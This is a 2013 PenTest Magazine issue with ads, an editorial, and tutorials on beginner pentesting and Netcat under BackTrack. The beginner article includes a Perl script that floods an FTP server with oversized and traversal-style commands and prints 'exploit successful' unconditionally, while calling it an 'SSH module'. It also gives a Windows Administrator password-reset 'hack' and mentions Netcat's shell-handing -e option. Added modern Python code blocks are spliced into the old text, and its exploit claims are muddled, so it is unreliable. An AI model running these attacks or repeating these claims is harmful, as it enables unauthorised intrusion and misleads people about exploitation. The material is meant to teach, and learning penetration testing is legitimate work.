PenTest Mag 2013 07

  • Cyber Security Auditing Software

    www.titania.com

    Improve your Firewall Auditing. As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

    The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.

    Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

  • www.titania.com

    Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania's products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

    With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

    You can customize the audit policy for your customers' specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues.

    Why not see for yourself, evaluate for free at titania.com

  • Page 4 http://pentestmag.com OPEN 06/2013

    Editor in Chief: Ewa Dudzic [email protected]

    Managing Editor: Jakub Walczak [email protected]

    Editorial Advisory Board: Jeff Weaver, Rebecca Wynn, William F. Slater, III

    Betatesters & Proofreaders: Jackson Bennet, Amit Chugh, Gregory Chrysanthou, Rodrigo Comegno, Dan Dieterle, Pinto Elia, Zbiegniew Fiona, José Luis Herrera, Antonio James, Duncan Keir, David Kosorok, Gilles Lami, L. Motz, Horace Parks, Jr, Sagar Rahalkar, Michał Rogaczewski, Antonio Domenico Saporita, Robin Schroeder, Jeff Smith, Johan Snyman, Arnoud Tijssen, Tom Updegrove, Jakub Walczak and others

    Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.

    Senior Consultant/Publisher: Paweł Marciniak

    CEO: Ewa Dudzic [email protected]

    Production Director: Andrzej Kuca [email protected]

    Art Director: Ireneusz Pogroszewski [email protected]

    DTP: Ireneusz Pogroszewski

    Publisher: Hakin9 Media, 02-682 Warszawa, ul. Bokserska 1. Phone: 1 917 338 3631. www.pentestmag.com

    Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.

    All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

    DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

    Dear PenTest Readers,

    You are probably wondering what you will find in the upcoming issues of the magazine. The free (as you probably already know, since you are reading this) PenTest OPEN, as always, is here to answer this question and show you what you can expect from our future publications.

    This month, we will go back a bit to the past and give you a glimpse of what you can find in our enormous (150 pages) July release, the BackTrack Compendium. We decided to give you an opportunity to take a look at three articles from this issue of PenTest Extra. Davide Peruzzi, OSCP, will bring your attention to the importance of preparation for pentesting. Also, Lance Claghorn will discuss the five common stages of an attack and how to use them for testing. Finally, Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme will provide you with a broad guide to using BackTrack for penetration testing.

    Time for something fresh for the freshmen. Our recently published Starter Kit gives you several tips on how to become a pentesting rock star. In PenTest OPEN we give you two tastes of what you will find in the issue. Chris Berberich guides our young cadets through a properly conducted penetration test and shows how to avoid typical mistakes. On the other hand, Jane Andrew advises how smartphone pentesting can save a business.

    In addition, continuing the smartphone topic, Michael Trofi and Duane Schleen put the limelight on the risks coming out of mobile application vulnerabilities. To finish our journey through the issue, Fadli B. Sidek will instruct you how to evade anti-virus and anti-spam detection.

    We hope you will enjoy PenTest OPEN and gain much new knowledge. Have a nice read!

    Jakub Walczak and PenTest Team

  • CONTENTS

    FOR STARTERS

    06 Pivotal Basics for Every Beginner
    By Chris Berberich
    Pentesting is always very hard at the beginning. People often make really trivial mistakes. Steps and suggestions in this article will help you avoid most of them and conduct a proper pentest.
    FROM: Starter Kit 03/2013 Become Well-known Pentester Today

    BACKTRACK

    12 Sharpen your Axe with BackTrack
    By Davide Peruzzi
    Abraham Lincoln said "Give me six hours to chop down a tree and I will spend the first four sharpening the axe." This is really the basic concept and the starting point of every penetration test.
    FROM: PenTest Extra 03/2013 BackTrack Compendium

    18 Pentesting with Backtrack
    By Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme
    Penetration testing, also known as pentesting, is a technique to evaluate the security of computers and networks by performing attacks that imitate external and internal threats. The pentesting process involves static and dynamic analysis of a system/network in order to reveal potential security issues resulting from improper configurations or hardware/software flaws. These attacks should be executed from the point of view of potential attackers.
    FROM: PenTest Extra 03/2013 BackTrack Compendium

    40 Multiphase Penetration Testing: Using BackTrack Linux, Metasploit and Armitage
    By Lance Cleghorn
    The EC-Council identifies five stages of attack that are common to cyber penetration. These stages of attack may be used to categorize incidents where a network or a host has been compromised. Considering that these stages are common to real attacks, they are used by ethical hackers to conduct penetration testing. An ethical hacker or a white-hat hacker may use these steps in order, or may selectively choose the steps that work best for the particular vulnerability.
    FROM: PenTest Extra 03/2013 BackTrack Compendium

    SMARTPHONES

    46 Mobile Applications: The True Potential Risks. Where to Look for Information When Performing a Pentest on a Mobile Application
    By Michael Trofi and Duane Schleen
    This article mainly covers what security professionals should be looking for when performing a penetration test of a mobile application. Although similar data concerns exist on the Android and Windows 7-based phones, the main discussion here concentrates on data found for iOS applications.
    FROM: PenTest WebApp 01/2013 Build Your Own Pentesting Workshop (TO BE RELEASED)

    54 Employers: Smartphone Pentesting could Save your Business
    By Jane Andrew
    Are you an owner of a company? If so, you cannot miss this article. It will help you improve your firm's security and avoid unnecessary expenses.
    FROM: Starter Kit 03/2013 Become Well-known Pentester Today

    ANTI-VIRUS SOFTWARE

    60 AV Evasion: Bypassing AV Products and Protection Against It
    By Fadli B. Sidek
    AV evading techniques are getting better and smarter by the day, and having just an AntiVirus and AntiSpyware application is insufficient to protect our machines from additional angles of threats.
    FROM: PenTest Regular 05/2013 (TO BE RELEASED)

  • FOR STARTERS

    Pivotal Basics for Every Beginner

    By Chris Berberich

    Is being a pentester your dream job? Would you like to do pentesting every day until death but you do not know where to start? In this article I will describe all you need to begin the journey.

    I believe that penetration testing, and any other internet security field, is more of a frame of mind than anything, i.e. thinking outside the box. When a person asks what I do for a living and I tell them I am a pentester, their response is always the same: "What is that and how can I get that title?" I have the same answer every time: a penetration test is a chess match. It is played between the pentester and the contracting organization's IT department. You start out as a pawn and end up as a queen. That queen must be able to accomplish checkmate in the organization's network infrastructure.

    There are three different groups of educated pentesters. There is the self-educated, which include people like gamers and those who are simply curious about how to hack a network. Then you have the college educated, who decided to go to school and learn how a network operates and how to secure the network. Lastly, you have the third category, which combines the first two. Neither is better than the other, because to become a well-known pentester, you must be educated in networking, have certifications to prove you can go the extra mile and be up to date with the latest technologies.

    Types of Pentesters

    A pentester is considered an ethical hacker because there has to be a level of trust between the hiring organization and the tester. When I tell people I am a pentester, I usually follow by explaining that I am an ethical hacker. It is confusing because these two roles can seem to conflict with one another. Before becoming a pentester, you have to decide which group of hackers you want to fall under: a white hat, grey hat, black hat hacker, or a script kiddie. The term hacker has not always had the negative connotations that it has today. A hacker originally described a person with a desire to learn about and experiment with technology and referred to someone who was technically proficient with whatever systems they hacked. The group under which you portray yourself will determine if you should pursue a career as a pentester.

    White hats may be security professionals, hired by companies to audit network security or test software. Having access to the same software tools that other hackers use, a white hat seeks to improve the security of a network by attacking a network or application as a black hat hacker would.

    A black hat hacker is a person who attempts to find network and application security vulnerabilities and exploit them for personal financial gain or other malicious reasons. This differs from white hat hackers, who are security specialists employed to use hacking methods to find security flaws that black hat hackers may exploit.

    This article comes from the PenTest Starter Kit.


    Black hat hackers can inflict major damage on both individual computer users and large organizations by stealing financial information, compromising the security of systems, or by dropping a network or changing the function of websites and networks.

    A grey hat is willing to go to the extremes of both black and white hat hackers. Black hats typically indulge to prove a point that is usually supported by white hats. A person's grey "principles" are the very thing that sets them apart from other classified hackers. In most situations, they may not disclose their activities due to legal consequences. It is not out of the question for a grey hat hacker to hack for personal gain, although it is also not unheard of for them to compromise whole systems for the perceived "greater good" either.

    A script kiddie is a derogatory term used to refer to non-serious hackers who are believed to reject the ethical principles held by professional hackers, which include the pursuit of knowledge, respect for skills, and a motive of self-education. Script kiddies shortcut most hacking methods in order to quickly gain their hacking skills. They will use resources such as YouTube and watch a video of an actual attack performed by a genuine hacker and then try to replicate the attack. They attempt to attack and crack computer networks and vandalize websites. Although they are considered to be inexperienced and undeveloped, script kiddies can impose as much computer damage as skilled hackers.

    The majority of pentesters fall under the white hat, grey hat, and script kiddie group. You really cannot be a black hat and a pentester because that means you deliberately destroy a network when you perform a pentest. In this industry you will not last long with that mentality.

    Yes, I put some of the pentesters in the script kiddie group. Over the years, I have looked over other companies' pentest reports and it baffles me how some organizations pass off their reports as serious pentest reports when they are more like a vulnerability assessment. I have seen instances when a company would run a vulnerability scanner and turn those results in as a pentest report. In other cases, I have seen reports delivered by an organization that only ran Metasploit (which is a program that does exploits for you). The problem with these situations is that, first, these are not examples of penetration tests but rather are just vulnerability assessments. Second, we lose our skills as IT security professionals if we rely solely on GUI interface tools. The only thing you learn from this experience is how to use a GUI interface and how to hit the start button. To me, this is a huge problem. I believe that in order to be a well-known pentester, you need to know what is going on behind the scenes of that vulnerability scanner and its exploits. Ask yourself: what is it actually scanning? When I begin a pentest, there is a lot I need to prepare before I even start scanning.

    Penetration Testing vs Vulnerability Assessment

    Vulnerability Assessment:

    • Typically is general in scope and includes an assessment of the network or a web application,
    • A scan that will identify known network, operating system, web application, and web server vulnerabilities with the use of GUI interface tools and doing very minimal exploiting, if any,
    • Unreliable at times and a high rate of false positives.

    Penetration Testing:

    • Focused in scope and may include targeted attempts to exploit specific vectors,
    • Extremely accurate and reliable,
    • Penetration Testing = vulnerabilities that have been exploited and confirmed.

    It is impossible to say that a Vulnerability Assessment is a better choice than a Penetration Test. Both Vulnerability Assessments and Penetration Tests are a necessity to an organization's network security. I suggest, at a minimum, that you run a vulnerability assessment at least every three months and a full blown Penetration Test once a year. By doing this, you ensure the hardening of your network from hackers.

    Testing Phases

    Though the methodology used by a pentester may change depending on individual preferences, client contract or employer principles, for the most part all methodologies include the same stages.

    Planning and Scoping

    The planning and scoping stage occurs when your organization and the client decide what is within the scope and what needs to be excluded from the test. As a pentester, you must be aware of any potential risks associated with the pentest. Before you start the penetration test always get a "get out of jail free card": this is a signed document from the organization and yourself. This document should include the scope of the test, URLs, external and internal IPs to be tested. Also there needs to be some verbiage for the case that the network does go down or there are severe bandwidth issues from your GUI scanners that interrupt the organization's everyday business continuity. Also, it should state that they have everything backed up and cannot go after you for any reason legally.

    Here is an example of a scope between yourself and the client:

    The scope encompassed the internal and external network infrastructure, which included routers, servers, and firewalls hosted in the organization's Cincinnati, Ohio office. The network penetration test was performed from the organization's network in the Cincinnati, Ohio office.

    Information Gathering

    In this phase, the penetration tester will accumulate as much information as possible that will assist with the test. This includes public records, email addresses within the organization, and the organization's web presence. In the initial stage, web search engines are used to gather as much information about the target organization as possible, including target machines on the network. The next step is to find live hosts on the network, which can be achieved through the use of discovery tools such as Nmap. After gathering a list of machines on the network and the open ports, we have to verify that the ports are actually open. The reason for this is that sometimes machines give false results, especially UDP ports. So for example, we identified a machine with a lot of ports open and with an IP address of 10.5.1.1. Let's do a little reconnaissance on that target.

    Reconnaissance

    In this stage, the penetration tester starts to assess all of the options available within the scope of the penetration test. The pentester decides what tools are to be used and the method of the pentest itself. This will include methods such as network scanning, enumeration, and code injection. The goal of reconnaissance is to classify vulnerabilities that the tester will then attempt to exploit in the next phase. There are many vulnerability scanners out there, so which one should I use? Personally, I use several to make sure that there are as few false positives as possible on the vulnerability report itself. As a penetration tester, you have to be resourceful and use what is available. For this test let's use a vulnerability scanner within Kali. You are probably also wondering why you would use a vulnerability scanner when such a tool creates a lot of noise on the network? It is very simple. The job of a penetration tester is to be as thorough as possible, uncovering as many holes as they can find. It is always the penetration tester's job to verify each vulnerability found before marking it as a positive result and to remove all the false positives. There are hundreds of pages of information in the scan report. I would suggest looking at all of the results. For this case, the one that I am interested in is the vulnerability marked as high, so I am going to click on this one and see what it says. The scanning of 10.5.1.1 found the password anonymous within the FTP account.

    Here is an example of a vulnerability that could be exploited, found as a result of the vulnerability scanner:

    Anonymous FTP

    Synopsis: Disable anonymous FTP access if it is not needed. Anonymous FTP access can lead to an attacker gaining information about your system that can possibly lead to them gaining access to your system.

    Exploitable

    Risk Factor: Medium (CVSS 7.1)

    Host: 10.5.1.1

    Exploitation

    Exploiting is the art of taking advantage of known vulnerabilities discovered in the scanning phase. The idea is to gain access to the systems as a hacker would and exploit them. This may include SQL injection, input validation, Cross-Site Scripting and Broken Authentication and Session Management. We will be using the username list that we grabbed during the vulnerability assessment phase (I created a file named anonymous.doc with the name anonymous), and a copy of the provided wordlist that comes within the applications of Kali. We will also run the SSH module written in Perl, since we already know that the anonymous account is enabled for FTP. Let's look up the CVE numbers and search Google. CVE-1999-0527 is the CVE number that I found using Google. So to make sure this isn't a false positive, let's go back to the SSH module and re-scan for an anonymous password on the FTP account.

    [22][ssh] host: 10.5.1.1 login: anonymous password: anonymous
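The verification step the article insists on (confirm a scanner's anonymous-FTP finding before it goes in the report, or strike it as a false positive), as an added example in Python that is not code from the article: it attempts the anonymous login with the standard library's ftplib and classifies the outcome as confirmed, false positive or unverified. StubFTP and the hosts other than 10.5.1.1 are constructed stand-ins so the module runs offline; with the default ftp_factory the same function performs the live check.

```python
"""Recheck a scanner's "anonymous FTP" finding by attempting the login.

Added example, not code from the article. Uses the standard library's ftplib;
StubFTP is a constructed stand-in for ftplib.FTP so the module runs offline.
"""
import ftplib


def check_anonymous_ftp(host, port=21, timeout=5.0, ftp_factory=ftplib.FTP):
    """Attempt an anonymous login against host:port and report the outcome.

    Returns a dict with:
      anonymous -> True (login accepted), False (login refused), None (no verdict)
      detail    -> the server reply or the error text, for the report
      entries   -> number of names returned by NLST after a successful login
    """
    result = {"host": host, "port": port, "anonymous": None, "detail": "", "entries": 0}
    ftp = ftp_factory()
    try:
        ftp.connect(host, port, timeout)
    except ftplib.all_errors as exc:  # all_errors includes OSError (refused, timeout)
        result["detail"] = "connect failed: %s" % exc
        return result
    try:
        # RFC 959: reply 230 means the login succeeded. ftplib raises error_perm
        # for 5xx replies such as "530 Login incorrect".
        reply = ftp.login("anonymous", "anonymous@example.com")
        result["anonymous"] = reply.startswith("230")
        result["detail"] = reply
        if result["anonymous"]:
            names = []
            ftp.retrlines("NLST", names.append)  # what an anonymous user can see
            result["entries"] = len(names)
    except ftplib.error_perm as exc:  # login refused: the finding is a false positive
        result["anonymous"] = False
        result["detail"] = str(exc)
    except ftplib.all_errors as exc:  # dropped connection, timeout, odd reply
        result["detail"] = "error after connect: %s" % exc
    finally:
        try:
            ftp.quit()
        except ftplib.all_errors:
            ftp.close()
    return result


def verdict(result):
    """Map the check result to the wording that goes into the report."""
    return {True: "CONFIRMED", False: "false positive", None: "unverified"}[result["anonymous"]]


class StubFTP:
    """Constructed stand-in for ftplib.FTP with scripted replies (no network)."""

    def __init__(self, accept_anonymous, names=(), reachable=True):
        self.accept_anonymous = accept_anonymous
        self.names = list(names)
        self.reachable = reachable

    def connect(self, host, port=0, timeout=None):
        if not self.reachable:
            raise OSError("[Errno 111] Connection refused")
        return "220 stub FTP ready"

    def login(self, user, passwd):
        if user == "anonymous" and self.accept_anonymous:
            return "230 Login successful."
        raise ftplib.error_perm("530 Login incorrect.")

    def retrlines(self, cmd, callback):
        for name in self.names:
            callback(name)
        return "226 Directory send OK."

    def quit(self):
        return "221 Goodbye."

    def close(self):
        pass


def demo():
    """Run the check against three scripted servers. 10.5.1.1 is the article's
    target; the other two addresses are constructed. A live check would be
    check_anonymous_ftp("10.5.1.1") with the default ftp_factory."""
    confirmed = check_anonymous_ftp("10.5.1.1", ftp_factory=lambda: StubFTP(True, ["pub", "incoming"]))
    refused = check_anonymous_ftp("10.5.1.2", ftp_factory=lambda: StubFTP(False))
    down = check_anonymous_ftp("10.5.1.3", ftp_factory=lambda: StubFTP(True, reachable=False))
    return confirmed, refused, down


if __name__ == "__main__":
    for r in demo():
        print("%s:%d anonymous FTP %s (%s, %d entries)"
              % (r["host"], r["port"], verdict(r), r["detail"], r["entries"]))
```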

    Privilege Escalation

    Exploiting a system can result in access to the system with rudimentary privileges. Privilege escalation is the process to gain further access and additional permissions. Learning manual exploits is a key step to becoming a well-known penetration tester and not using a GUI interface tool to do the exploit for you. Automated tools can cause a drop in a network's bandwidth or drop the network itself. Causing this to happen will give you a bad reputation. While pressing start on a GUI tool, it goes through a lot of unneeded functions like DDoS and DoS attacks, which are not usually welcomed by your client. It takes a lot of time and practice to gain privileges to systems doing manual exploits but it is well worth it. Although exploiting a system results in access, on many instances that access is limited to an account with only rudimentary permissions.

    Privilege escalation is the process of using further techniques or exploits to gain further permissions. The more permission gained, the more likely a tester is of achieving access to further systems and confidential data.

    For this we will run an SSH module written in Perl (Listing 1).

    Listing 1. SSH module in Perl

    #!/usr/bin/perl
    # Listing 1, reconstructed from the flattened magazine listing. Despite the
    # title, the script speaks the FTP control protocol (USER, PASS, CWD, NLST,
    # SIZE): it logs in as "anonymous" and sends three commands with oversized
    # or traversal-style arguments to the target. Usage: perl listing1.pl HOST PORT
    use strict;
    use warnings;
    use IO::Socket::INET;

    my ($host, $port) = @ARGV;
    die "usage: $0 HOST PORT\n" unless defined $host && defined $port;

    # The PASS value is reproduced as printed in the magazine (the e-mail address
    # was redacted in the scan; the third block there listed one more address).
    my $user  = "USER anonymous\r\n";
    my $passw = "PASS [email protected], 192.168.91.13, 192.168.91.12, 192.168.90.251, 192.168.90.253\r\n";
    my $send  = "\r\n";

    # Each block of the original opens a fresh connection, logs in and sends one
    # command; the repeated steps are gathered in this sub.
    sub ftp_cmd {
        my ($command, $dos_input) = @_;
        my $serverdata;
        my $socket = IO::Socket::INET->new(
            Proto    => "tcp",
            PeerAddr => $host,
            PeerPort => $port,
        ) or die "cannot connect to $host:$port: $!\n";
        $socket->recv($serverdata, 1024);   # server banner
        print $serverdata;
        $socket->send($user);
        $socket->recv($serverdata, 1024);
        $socket->send($passw);
        $socket->recv($serverdata, 1024);
        $socket->send($command . $dos_input . $send);
        $socket->recv($serverdata, 1024);   # reply to the command
        print $serverdata;
        $socket->close;
    }

    ftp_cmd("CWD ",  "." x 250);
    ftp_cmd("NLST ", "/.../.../.../.../.../");
    ftp_cmd("SIZE ", "/.../.../.../.../.../");
    # The original listing ends by printing this line.
    print "exploit successful\r\n";

    As you can see, we successfully exploited the FTP account. So you have your results from the vulnerability scanner(s) and completed a few exploits. Now you have to present the vulnerabilities and exploits to the organization. This is done by writing a complete report. Remember to take screen shots of the exploits so that you have proof of the exploit being completed. This will show the organization that you truly know what you are doing as a pentester, and you will be on your way to becoming a well-known penetration tester.

    Reporting

    This section provides the contracting organization a summary of the results from the vulnerability scanner and the exploits that were accomplished during the pentest. The report is broken down into two major sections in order to communicate the objectives, methods, and results of the testing to an executive level and IT staff. The report should be broken down into:

    • The Executive Summary, which would include: an executive summary of the penetration test, scope, a background section explaining the overall posture of the organization, and a recommendation summary.

    • The Technical Report, which would be organized for the IT staff so that they can review and fix the vulnerabilities. This part of the report should include information gathering, vulnerability assessment, exploitation/vulnerability confirmation, and the risk of the vulnerabilities to the organization.

    Certifications

    Why get certifications? Some of the best hackers do not have certifications, so why should I get them? You do so because you want to become a well-known penetration tester and not just a hacker. To do this, you need to show that your skills are up to date and that you are willing to put in the time to show your employer that you have the skills to do a penetration test. You're also impressing on your employer that you're a valued member of the team and that you're willing to learn. There are many certifications to choose from. A few that stand out are: Certified Penetration Testing Engineer (C)PTE, Certified Penetration Testing Consultant C)PTC, GIAC Penetration Tester (GPEN), Certified Ethical Hacker (CEH) and Offensive Security Certified Professional (OSCP). It seems everyone has their own preference in choosing which one is better than the other.

    Summary

    The process of becoming a well-known penetration tester is not going to happen overnight. Being a pentester is my dream job when it comes to IT security. Taking this journey and becoming a well-known penetration tester involves the pursuit of knowledge, whether it is self-taught or through formal education. It is essential to become acquainted with network basics, particularly the OSI model, TCP/IP, handshakes, the different types of packets, and what's contained in the headers.

    I also suggest getting an understanding of network scanners and web application scanners. There are plenty of organizations out there that have white papers and tutorials regarding networks and web applications (OWASP, SANS, and NIST). Find practice labs so that you can get practice hacking networks.

    With all this documentation and assistance it is quite simple to become a pentester, but to be a well-known pentester you must not be limited to one technology. You virtually need to know everything when it comes to servers, networks, and vulnerabilities that can be exploited. You need to ensure that you have a thorough understanding of security. Associate yourself with experienced pentesters and join forums and communities that are willing to extend a helping hand. I was once told that the hacking community, in general, is willing to help newbies into the hacking community. In general that is a true statement.

    To be a successful and well-known hacker you will need to understand and be able to write your own scripts and understand programming languages. While you are on your way to learning about programming, the main question to ask is which language to learn. This debate has gone on for years and there really is no correct answer to it. Each organization for the most part uses one or two languages for their programming so that they can master the language and hire skilled programmers to keep the organization running. As a pentester you should know multiple languages to some degree and understand each language. Python is a good language to start off with because it's efficiently designed, well documented in forums, and moderately kind to beginners. If you get into serious programming, you will have to learn C, the core language of Unix, which a pentester should learn or have knowledge of. Perl is worth learning for everyday reasons; it's very widely used for web pages and system administration, so that even if you never write Perl, you should learn to read it.

    Also, as a penetration tester you must stay up to date on coding, vulnerabilities, and updates to a network. The organization that hired you will expect you to be current in all subjects related to IT security. There is a saying, "patch Tuesday, hack Friday"; this basically means that when Microsoft patches come out on Tuesday, those patches are being hacked by Friday. Remember there are brontobytes of information floating around the web. My suggestion is to join forums and hacking organizations, and read white papers from reliable sources to stay on top of the new technology out there.

    In conclusion, not everyone will want to become a penetration tester or even know what one is, but within the professional community, there are some key steps to becoming well-known and respected. You must commit to continuing education, don't be afraid to ask for help, and practice and develop your skills.

    Bonus

    Here is some information which is useful but did not fit into the article well.

    Key knowledge

    • A penetration test is not a vulnerability scan and a vulnerability scan is not a penetration test,
    • Learn everything you can about operating systems and servers, not just one flavor,
    • Understand the true concepts of TCP/IP, subnets, and coding in as many languages as possible,
    • Remember you will not know everything IT related; Google is your best friend.

    Tip

    Here is a tip that an old school hacker sent me at one point in time. It works about 60 percent of the time depending on the operating system and what not. As for all exploits, the same percentage could go, because you are not going to exploit and get root permissions every time you do a pentest due to time restraints within the scope.

    If you want to hack a computer's Administrator account and you are logged in to the computer with some other account, here are the steps:

    1. Go to the Start button and click on Run.
    2. Type CMD and press Enter. A command window will open.
    3. Type net users. This will show you all the users of that computer.
    4. Now type net user administrator * and press Enter. This will ask you to enter a password.
    5. Enter the password you want to keep for the administrator.
    6. Re-enter your password to confirm it. DONE.

    CHRIS BERBERICH
    Chris Berberich is a Penetration Tester/Senior Auditor at A-lign Security and Compliance Services based in Tampa, Florida. Chris has an extremely deep and solid understanding of application, server, and network security. Chris's focus as a penetration tester has been managing corporate Internet infrastructure, systems, and network security, specifically operating systems, web application servers, databases, interfacing, and data privacy. Certifications: (C)PEH, (C)PTE. [email protected].


  • BACKTRACK

    Page 12 http://pentestmag.com OPEN 06/2013

    Sharpen your Axe with BackTrack

    Gathering phase

    Abraham Lincoln is quoted as saying, "Give me six hours to chop down a tree and I will spend the first four sharpening the axe." This is really the basic concept and the starting point of every penetration test.

    In a pen test you have to sharpen your axe first by gathering information. The more you obtain, the more attack surface you will have. The gathering phase isn't the most exciting one, but it is surely the one that lets you do things better and smarter. So what do you need? Let's see.

    First, you need an adequate system with the right toolkit and a little knowledge of how the tools work. We will use one of the latest versions of BackTrack (BT) because it is a powerful and widespread operating system, so it is quite simple to get support or tutorials on the Web: YouTube has a video for almost every BT tool. (BackTrack has since been superseded by Kali Linux, which ships the same tools, though the /pentest/... paths used below no longer exist there.)

    The best way to start with BT is virtualization: you can download a ready-made virtual machine. With virtualization you can also easily build a cheap and smart lab in which to perform your tests. If you already have a test network, you can use the bootable CD instead.

    Next you have to be calm and patient; only this way can you collect information and inspect it properly. You can write your own checklist of tests to do or copy one from the Web, but once you have your list you have to follow it meticulously. Remember that you are sharpening.

    Now you need to write down all the data you collected, so that everything is recorded and you can analyze it even when you aren't connected to the LAN you have to test. Furthermore you will use these records to write a detailed report for your customer, or to roll back in case you mess something up.

    I use KeepNote to keep track of all my operations and results, and Zenmap (the Nmap GUI) to map the network, but BT has many more powerful tools than these. Maltego, for example, is awesome.

    My friend Netcat

    Now let's start to use the father of all tools, the famous 'Swiss-army knife for TCP/IP': Netcat.

    Essentially, NC is a utility which reads and writes data across network connections, using the TCP or UDP transport. Nothing more, nothing less.

    So why is it so important? When an inexperienced PC user wants to test whether his machine can browse the Internet, he opens his browser and points it at a common address: www.google.com. This is not the best test he could do: it only tells him whether he is browsing, and says nothing about why if he is not.

    So the approach must be different. He has to start from a layer close to the PC, not close to the user, and investigate the causes step by step up to the human layer.

    You are not an inexperienced person, so you start by opening a command shell and pinging your gateway. Is it responding? If not, check it. Then ping an external IP address (e.g. 8.8.8.8, which is Google's public DNS). Is it responding? Alright, you are able to get out of your network. Next you test whether your DNS is working by pinging a DNS name such as www.google.com. Only if all of this works do you open your browser and test the connection. You can still have a problem in the browser (e.g. a misconfigured proxy), but after the tests you have done you can rule out all the lower layers and focus on the current one.

    That's why NC is so important. It allows you to start from the lowest layer; it is the equivalent of the ping command in the example, but it has many more applications.

    Well, open your Terminal window and have a look at the NC help.

    At the beginning you will use the options -l (put NC in listening mode), -v (verbose mode is always better) and -p (set the port where NC listens). Try this:

    Open two Terminal windows on the same machine. In the first window start a service that listens on a specific port using Netcat (this is called the listener):

    nc -lvp 4444

    If you look at the network connections of your BT machine with the command netstat -nat, you will find a listening socket on port 4444 (a tcp line for 0.0.0.0:4444 in state LISTEN).

    In the second window use NC as a client and connect to localhost on port 4444

    nc 127.0.0.1 4444 -v

    Press Enter and you have established a simple connection with NC. But what is this?

    Essentially, it is a simple chat. If you write something in window 1 it appears in window 2, and vice versa (see Figure 1).

    So NC is a program that lets you communicate over TCP or UDP, and you can use it either as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test whether a remote port is open, to grab information about a service listening on a remote PC (the banner) and to talk to that service; you can also use it to redirect text, request an HTML page, and, last but not least, remotely administer a PC.

    If you have two PCs, try NC between them, or just continue testing on the same machine (that is the lowest layer).

    For example, you can try to pass text:

    echo 'This text will be transmitted using Netcat' | nc 127.0.0.1 4444

    ...and if the listener is started as follows, the text sent is also written to a file:

    nc -lvp 4444 > file.txt

    You can also try the -c (or -e) option of the traditional netcat for remote administration: it hands the connection to a shell, which is exactly why it is dangerous to leave such a listener running. I suggest you dig around the Internet to learn more about Netcat.
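    The listener, the client, the banner grab and the 'echo text | nc' transfer described above, re-created with the Python standard library as an added illustration (this is not Netcat's code, and the FTP-style banner and the listener on a loopback port are constructed for the demo):

```python
"""Netcat in miniature: what nc -l/-p and the client mode do under the hood.
Added illustration, not netcat's source. Everything runs on 127.0.0.1 and the
'220 fake-ftp ready' banner is constructed sample data."""
import socket
import threading


def start_listener(banner=b"", host="127.0.0.1", port=0):
    """Equivalent of `nc -lvp <port> > file.txt`: bind (port 0 lets the OS
    pick a free port, like choosing an unused -p value), accept exactly one
    connection in a background thread, optionally greet the peer with a
    banner, and keep everything the peer sends until it closes.
    Returns (bound_port, result, thread); result["data"] is filled in once
    the peer has disconnected."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]
    result = {"data": b"", "peer": None}

    def serve():
        conn, peer = srv.accept()
        result["peer"] = peer
        with conn:
            if banner:
                conn.sendall(banner)          # what a real service says first
            chunks = []
            while True:
                data = conn.recv(4096)
                if not data:                  # peer closed: EOF, like nc exiting
                    break
                chunks.append(data)
        result["data"] = b"".join(chunks)
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return bound_port, result, t


def connect_send(host, port, payload=b"", timeout=2.0, banner_wait=0.5):
    """Equivalent of `echo text | nc -v host port`: connect (a successful
    connect already proves the port is open), read whatever the service sends
    first (the banner), push the payload, then half-close so the listener sees
    EOF. Returns the banner, b"" for a silent service such as nc -l itself."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(banner_wait)
        try:
            banner = s.recv(4096)
        except socket.timeout:
            banner = b""
        if payload:
            s.settimeout(timeout)
            s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
    return banner


def demo():
    """Listener and client on the same machine, like the two-terminal test."""
    port, result, t = start_listener(banner=b"220 fake-ftp ready\r\n")
    banner = connect_send("127.0.0.1", port,
                          b"This text will be transmitted using Netcat\n")
    t.join(5)
    return banner, result["data"]


if __name__ == "__main__":
    grabbed, received = demo()
    print("banner grabbed by client :", grabbed)
    print("data received by listener:", received)
```

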